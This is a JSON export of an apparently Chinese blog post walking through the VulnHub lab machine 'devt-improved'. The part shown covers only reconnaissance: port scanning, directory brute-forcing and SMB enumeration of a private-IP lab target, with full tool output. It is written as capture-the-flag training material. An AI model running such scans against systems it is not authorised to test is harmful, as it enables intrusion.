{"id":448,"date":"2024-03-23T20:25:01","date_gmt":"2024-03-23T12:25:01","guid":{"rendered":"http:\/\/162.14.82.114\/?p=448"},"modified":"2024-03-23T20:28:07","modified_gmt":"2024-03-23T12:28:07","slug":"vulnhub-devt-improved","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/448\/03\/23\/2024\/","title":{"rendered":"Vulnhub&#8211;devt-improved"},"content":{"rendered":"<h1>devt-improved<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024726.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024726.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323183815219\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024728.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024728.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323184903961\" style=\"zoom: 67%;\" \/><\/div><br \/>\n<div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024729.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024729.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323184931919\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u6ca1\u9519\u4e86<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.37.131 -- -A -sC -sV <\/code><\/pre>\n<pre><code class=\"language-apl\">Open 192.168.37.131:22\nOpen 192.168.37.131:113\nOpen 192.168.37.131:139\nOpen 192.168.37.131:445\nOpen 192.168.37.131:8080<\/code><\/pre>\n<pre><code class=\"language-text\">PORT     STATE SERVICE     REASON  VERSION\n22\/tcp   open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC\/0O8beKKMGvekLefDRWa\/MVhJwXr1B0PuQHDt8xlqKcpvdLCO6b0c+sfcemEq7m92V82fTy2BAvvkk9GZSQ+OrDfWzB1grIl6t9ndVBB++rz\/rZBwmZ\/VcSBLSwjRAnrHRiyCtunxDiWYwD2htq5FV2r4K38+YrWARqpapME\/K\/atz9Txxe4WwzihPB+910b0dG4JAn8hXG8VHZsJvo4qV0\/yEcSgwD9B4QV6XK3uxOnHviWUEJTOHU12LAz39KYj5Pir9BmSsfrbDgt4s06zR1RqviIF+GIJkbeWR5V5Mn9CazLuPmyrmybsFEfFMh5VeDJ33eCeGLhmHYoGEJ6p\n|   256 c2:b6:8c:36:a6:dd:9b:17:bb:4f:0e:0f:16:89:d6:4b (ECDSA)\n| ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ8C4BDQAOCp2TfWnvOmYyiiiYDe5ub2+NvCAkNWcXgavJtZUsBxXlTLhGWk2omUZtQCq4Tnb+BymEvKz8IKYXk=\n|   256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvQyP65\/4gxE9tbpAIijwT4kwjUtquJDVqd3+iNB0pN\n113\/tcp  open  ident?      syn-ack\n|_auth-owners: oident\n139\/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n|_auth-owners: root\n445\/tcp  open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\n|_auth-owners: root\n8080\/tcp open  http-proxy  syn-ack IIS 6.0\n|_http-open-proxy: Proxy might be redirecting requests\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: IIS 6.0\n|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Date: Sat, 23 Mar 2024 10:50:55 GMT\n|     Server: IIS 6.0\n|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT\n|     ETag: &quot;230-57de32091ad69&quot;\n|     Accept-Ranges: bytes\n|     Content-Length: 560\n|     Vary: Accept-Encoding\n|     Connection: close\n|     Content-Type: text\/html\n|     &lt;html&gt;\n|     &lt;head&gt;&lt;title&gt;DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!&lt;\/title&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;p&gt;Welcome to the Development Page.&lt;\/p&gt;\n|     &lt;br\/&gt;\n|     &lt;p&gt;There are many projects in this box. View some of these projects at html_pages.&lt;\/p&gt;\n|     &lt;br\/&gt;\n|     &lt;p&gt;WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.&lt;\/p&gt;\n|     &lt;br\/&gt;\n|     &lt;br\/&gt;\n|     &lt;br\/&gt;\n|     &lt;hr&gt;\n|     &lt;i&gt;Powered by IIS 6.0&lt;\/i&gt;\n|     &lt;\/body&gt;\n|     &lt;!-- Searching for development secret page... where could it be? 
--&gt;\n|     &lt;!-- Patrick, Head of Development--&gt;\n|     &lt;\/html&gt;\n|   HTTPOptions: \n|     HTTP\/1.1 200 OK\n|     Date: Sat, 23 Mar 2024 10:50:55 GMT\n|     Server: IIS 6.0\n|     Allow: GET,POST,OPTIONS,HEAD\n|     Content-Length: 0\n|     Connection: close\n|     Content-Type: text\/html\n|   RTSPRequest: \n|     HTTP\/1.1 400 Bad Request\n|     Date: Sat, 23 Mar 2024 10:50:55 GMT\n|     Server: IIS 6.0\n|     Content-Length: 293\n|     Connection: close\n|     Content-Type: text\/html; charset=iso-8859-1\n|     &lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n|     &lt;html&gt;&lt;head&gt;\n|     &lt;title&gt;400 Bad Request&lt;\/title&gt;\n|     &lt;\/head&gt;&lt;body&gt;\n|     &lt;h1&gt;Bad Request&lt;\/h1&gt;\n|     &lt;p&gt;Your browser sent a request that this server could not understand.&lt;br \/&gt;\n|     &lt;\/p&gt;\n|     &lt;hr&gt;\n|     &lt;address&gt;IIS 6.0 Server at 192.168.37.131 Port 8080&lt;\/address&gt;\n|_    &lt;\/body&gt;&lt;\/html&gt;\n1 service unrecognized despite returning data. 
If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8080-TCP:V=7.94SVN%I=7%D=3\/23%Time=65FEB40E%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,330,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2023\\x20Mar\\x\nSF:202024\\x2010:50:55\\x20GMT\\r\\nServer:\\x20IIS\\x206\\.0\\r\\nLast-Modified:\\x\nSF:20Wed,\\x2026\\x20Dec\\x202018\\x2001:55:41\\x20GMT\\r\\nETag:\\x20\\&quot;230-57de32\nSF:091ad69\\&quot;\\r\\nAccept-Ranges:\\x20bytes\\r\\nContent-Length:\\x20560\\r\\nVary:\nSF:\\x20Accept-Encoding\\r\\nConnection:\\x20close\\r\\nContent-Type:\\x20text\/ht\nSF:ml\\r\\n\\r\\n&lt;html&gt;\\r\\n&lt;head&gt;&lt;title&gt;DEVELOPMENT\\x20PORTAL\\.\\x20NOT\\x20FOR\\\nSF:x20OUTSIDERS\\x20OR\\x20HACKERS!&lt;\/title&gt;\\r\\n&lt;\/head&gt;\\r\\n&lt;body&gt;\\r\\n&lt;p&gt;Welco\nSF:me\\x20to\\x20the\\x20Development\\x20Page\\.&lt;\/p&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;p&gt;There\\x20ar\nSF:e\\x20many\\x20projects\\x20in\\x20this\\x20box\\.\\x20View\\x20some\\x20of\\x20t\nSF:hese\\x20projects\\x20at\\x20html_pages\\.&lt;\/p&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;p&gt;WARNING!\\x20W\nSF:e\\x20are\\x20experimenting\\x20a\\x20host-based\\x20intrusion\\x20detection\\\nSF:x20system\\.\\x20Report\\x20all\\x20false\\x20positives\\x20to\\x20patrick@goo\nSF:dtech\\.com\\.sg\\.&lt;\/p&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;hr&gt;\\r\\n&lt;i&gt;Powered\\x\nSF:20by\\x20IIS\\x206\\.0&lt;\/i&gt;\\r\\n&lt;\/body&gt;\\r\\n\\r\\n&lt;!--\\x20Searching\\x20for\\x20d\nSF:evelopment\\x20secret\\x20page\\.\\.\\.\\x20where\\x20could\\x20it\\x20be\\?\\x20-\nSF:-&gt;\\r\\n\\r\\n&lt;!--\\x20Patrick,\\x20Head\\x20of\\x20Development--&gt;\\r\\n\\r\\n&lt;\/htm\nSF:l&gt;\\r\\n&quot;)%r(HTTPOptions,A6,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x202\nSF:3\\x20Mar\\x202024\\x2010:50:55\\x20GMT\\r\\nServer:\\x20IIS\\x206\\.0\\r\\nAllow:\nSF:\\x20GET,POST,OPTIONS,HEAD\\r\\nContent-Length:\\x200\\r\\nC
onnection:\\x20clo\nSF:se\\r\\nContent-Type:\\x20text\/html\\r\\n\\r\\n&quot;)%r(RTSPRequest,1CC,&quot;HTTP\/1\\.1\nSF:\\x20400\\x20Bad\\x20Request\\r\\nDate:\\x20Sat,\\x2023\\x20Mar\\x202024\\x2010:5\nSF:0:55\\x20GMT\\r\\nServer:\\x20IIS\\x206\\.0\\r\\nContent-Length:\\x20293\\r\\nConn\nSF:ection:\\x20close\\r\\nContent-Type:\\x20text\/html;\\x20charset=iso-8859-1\\r\nSF:\\n\\r\\n&lt;!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\&quot;-\/\/IETF\/\/DTD\\x20HTML\\x202\\.0\/\/EN\nSF:\\&quot;&gt;\\n&lt;html&gt;&lt;head&gt;\\n&lt;title&gt;400\\x20Bad\\x20Request&lt;\/title&gt;\\n&lt;\/head&gt;&lt;body&gt;\\\nSF:n&lt;h1&gt;Bad\\x20Request&lt;\/h1&gt;\\n&lt;p&gt;Your\\x20browser\\x20sent\\x20a\\x20request\\x2\nSF:0that\\x20this\\x20server\\x20could\\x20not\\x20understand\\.&lt;br\\x20\/&gt;\\n&lt;\/p&gt;\\\nSF:n&lt;hr&gt;\\n&lt;address&gt;IIS\\x206\\.0\\x20Server\\x20at\\x20192\\.168\\.37\\.131\\x20Por\nSF:t\\x208080&lt;\/address&gt;\\n&lt;\/body&gt;&lt;\/html&gt;\\n&quot;);\nService Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: development\n|   NetBIOS computer name: DEVELOPMENT\\x00\n|   Domain name: \\x00\n|   FQDN: development\n|_  System time: 2024-03-23T10:52:25+00:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 33014\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 62492\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 23242\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 17670\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| Names:\n|   DEVELOPMENT&lt;00&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n|   DEVELOPMENT&lt;03&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n|   DEVELOPMENT&lt;20&gt;      Flags: 
&lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2024-03-23T10:52:25\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_clock-skew: mean: 0s, deviation: 0s, median: 0s<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u6ca1\u5f00 80 \u7aef\u53e3\uff0c\u4f46\u662f\u5f00\u4e86 8080 \u7aef\u53e3\uff0c\u5c1d\u8bd5\u626b\u63cf\u3002<\/p>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/192.168.37.131:8080<\/code><\/pre>\n<pre><code class=\"language-text\">403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        5l        4w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      316c http:\/\/192.168.37.131:8080\/aspnet_client =&gt; http:\/\/192.168.37.131:8080\/aspnet_client\/\n200      GET        1l        5w       29c http:\/\/192.168.37.131:8080\/error\n200      GET       13l       23w      154c http:\/\/192.168.37.131:8080\/_vti_cnf\n200      GET       30l       99w      936c http:\/\/192.168.37.131:8080\/about\n200      GET       13l       23w      154c http:\/\/192.168.37.131:8080\/_vti_pvt\n200      GET       13l       23w      154c http:\/\/192.168.37.131:8080\/_vti_bin\n200      GET  
      9l       94w      576c http:\/\/192.168.37.131:8080\/development\n200      GET        6l       13w      144c http:\/\/192.168.37.131:8080\/root\n200      GET       21l       72w      560c http:\/\/192.168.37.131:8080\/\n[#&gt;------------------] - 77s     3080\/60004   23m     found:9       errors:919    \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_192_168_37_131:8080-1711191937.state ...\n[#&gt;------------------] - 77s     3080\/60004   23m     found:9       errors:919    \n[#&gt;------------------] - 77s     2660\/30000   34\/s    http:\/\/192.168.37.131:8080\/ \n[####################] - 0s     30000\/30000   2727273\/s http:\/\/192.168.37.131:8080\/aspnet_client\/ =&gt; Directory listing\n[####################] - 5s     30000\/30000   6014\/s  http:\/\/192.168.37.131:8080\/aspnet_client\/system_web\/ =&gt; Directory listing\n[&gt;-------------------] - 68s      399\/30000   6\/s     http:\/\/192.168.37.131:8080\/aspnet_client\/system_web\/4_0_30319\/    <\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u4e00\u626b\u63cf\u7aef\u53e3\u5c31\u5168\u5173\u6389\u4e86\uff0c\u53ef\u80fd\u505a\u4e86\u9632\u62a4\u63aa\u65bd\uff0c\u91cd\u542f\u9776\u573a\u4e0d\u626b\u63cf\u4e86\u3002<\/p>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>SMB\u670d\u52a1\u63a2\u6d4b<\/h3>\n<pre><code class=\"language-bash\">smbmap -H 192.168.37.131<\/code><\/pre>\n<pre><code class=\"language-text\">[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.37.131:445      Name: 192.168.37.131            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        access                                                  NO ACCESS\n        IPC$                   
                                 NO ACCESS       IPC Service (development server (Samba, Ubuntu))<\/code><\/pre>\n<p>\u6ca1\u6709\u6743\u9650\u3002<\/p>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024730.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024730.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191344493\" \/><\/div><\/p>\n<pre><code class=\"language-text\">\/\/ http:\/\/192.168.37.131:8080\/html_pages\n-rw-r--r-- 1 www-data www-data      285 Sep 26 17:46 about.html\n-rw-r--r-- 1 www-data www-data     1049 Sep 26 17:51 config.html\n-rw-r--r-- 1 www-data www-data      199 Jul 23 15:37 default.html\n-rw-r--r-- 1 www-data www-data     1086 Sep 28 09:22 development.html\n-rw-r--r-- 1 www-data www-data      446 Jun 14 01:37 downloads.html\n-rw-r--r-- 1 www-data www-data      285 Sep 26 17:53 error.html\n-rw-r--r-- 1 www-data www-data        0 Sep 28 09:23 html_pages\n-rw-r--r-- 1 www-data www-data      751 Sep 28 09:22 index.html\n-rw-r--r-- 1 www-data www-data      202 Sep 26 17:57 login.html\n-rw-r--r-- 1 www-data www-data      682 Jul 23 15:36 register.html\n-rw-r--r-- 1 www-data www-data       74 Jul 23 16:29 tryharder.html\n-rw-r--r-- 1 www-data www-data      186 Sep 26 17:58 uploads.html<\/code><\/pre>\n<p>\u4f9d\u6b21\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024731.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024731.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191516055\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024732.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024732.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191654701\" \/><\/div><\/p>\n<h3>\u8ffd\u8e2a\u6570\u636e\u6d41\u6587\u4ef6<\/h3>\n<p>\u6253\u5f00\u770b\u4e00\u4e0b\u90a3\u4e2a\u6570\u636e\u6d41\u6587\u4ef6\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024733.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024733.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191853427\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024734.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024734.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323192405539\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024735.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024735.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323192513145\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024736.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024736.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323192725808\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5b50\u76ee\u5f55\u7206\u7834<\/h3>\n<p>\u4e00\u4e2a\u4e00\u4e2a\u641c\u7d22\u592a\u6162\u4e86\uff0c\u518d\u626b\u4e00\u4e0b\u5427\uff0c\u628a\u7ebf\u7a0b\u8c03\u4f4e\u4e00\u70b9\u3002<\/p>\n<pre><code>gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.37.131:8080\/developmentsecretpage\/ -f -t 10 -x html,php,txt,zip,jpg,png<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024737.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024737.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193119139\" style=\"zoom:50%;\" 
